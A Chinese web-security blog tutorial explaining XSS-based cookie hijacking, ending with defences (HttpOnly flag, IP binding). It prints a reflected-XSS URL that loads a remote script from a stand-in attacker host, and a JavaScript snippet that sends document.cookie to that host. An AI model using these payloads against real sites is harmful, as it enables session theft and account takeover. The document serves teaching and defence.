专业编程基础技术教程

网站首页 > 基础教程 正文

Web安全:XSS怎么实现?Cookie 劫持如此简单,你的网站安全吗?

ccvgpt 2024-11-26 00:49:48 基础教程 1 ℃

一旦网站存在XSS漏洞,最大的受害者不是网站管理方,而是众多的的网站用户。黑客利用XSS漏洞,劫持Cookie 之后,可以直接登录用户的管理中心,根本不需要密码,手机验证码神马的。

有人就会问了:So,进入管理中心有又什么用呢?

Web安全:XSS怎么实现?Cookie 劫持如此简单,你的网站安全吗?

进入管理中心就可以操作修改用户的个人信息,可以说是为所欲为。

有人就又问了:改就改吧,只要不改密码,随便改。

是的,现在大部分的网站,在用户修改密码时,需要用户输入原始密码,因此通过Cookie劫持,无法修改密码,但是如果黑客在你的管理中心,删博客,发帖,发表不当言论,你是不是就紧张?轻则丢失数据,重则被请去喝茶,是不是开始害怕了?



好了,下边我就开始了解一下,利用XSS,完成Cookie劫持的流程。

第一步:

首先,我们利用的XSS漏洞,加载一个远程的JS文件。

http://localhost:82/xxs-case1.php?param=<script src=http://www.hackerserver.com/xss.js><script>


第二步:

在xss.js里面,获取当前用户在当前网站的Cookie,并发送到恶意服务器。代码如下:

var img=document.createElement("img");
img.src="http://www.hackerserver.com/cookielog?"+escape(document.cookie);
document.body.appendChild(img);

第三步:

因为,当前的Web应用中,大部分的都是用Cookie来保存用户的登录凭证的,因此可以利用劫持到的的Cookie,不需要密码登录 ,访问用户的管理中心。



总结

有人问了,Cookie劫持这么危险,有没有有效的防御措施,答案是肯定的。

(1)设置HttpOnly 标识。给Cookie加上HttpOnly标识之后,恶意JS脚本就无法访问到浏览器里面存储的Cookie信息,从而有效的降低了Cookie被劫持的可能性。

(2)绑定客户端IP。后台把用户的Cookie和用户登录时的客户端IP绑定在一起,如此一来,就算Cookie被劫持,黑客也无法利用劫持到的Cookie登录用户管理中心。

Tags:

最近发表
标签列表